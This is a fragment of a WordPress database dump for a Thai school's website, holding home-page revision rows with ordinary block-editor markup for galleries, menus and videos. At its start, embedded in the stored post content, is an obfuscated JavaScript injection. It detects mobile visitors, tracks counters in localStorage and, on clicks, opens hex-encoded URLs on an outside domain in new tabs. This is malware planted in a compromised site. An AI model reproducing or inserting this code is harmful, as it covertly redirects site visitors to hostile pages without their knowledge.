_0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 12:29:51','2024-07-27 05:29:51','',14,'http://pakhaeng.ssk.in.th/?p=158',0,'revision','',0),
(159,1,'2024-07-27 12:34:12','2024-07-27 05:34:12','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/headline {\"uniqueId\":\"0ec6139a\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"22px\"}} -->\n<h2 class=\"gb-headline gb-headline-0ec6139a gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/grid {\"uniqueId\":\"19bd4464\",\"columns\":2,\"horizontalGap\":20,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"2cef18b9\",\"isGrid\":true,\"gridId\":\"19bd4464\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:video {\"id\":138} -->\n<figure class=\"wp-block-video\"><video controls poster=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/448905004_973201524597519_7994539186753533290_n-1.jpg\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/สุนทนภู่.mp4\"></video></figure>\n<!-- /wp:video -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"66a01ab5\",\"isGrid\":true,\"gridId\":\"19bd4464\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:video {\"id\":142} -->\n<figure class=\"wp-block-video\"><video controls poster=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/Untitled.png\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/สุขาดี.mp4\"></video></figure>\n<!-- /wp:video -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#6096b4\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 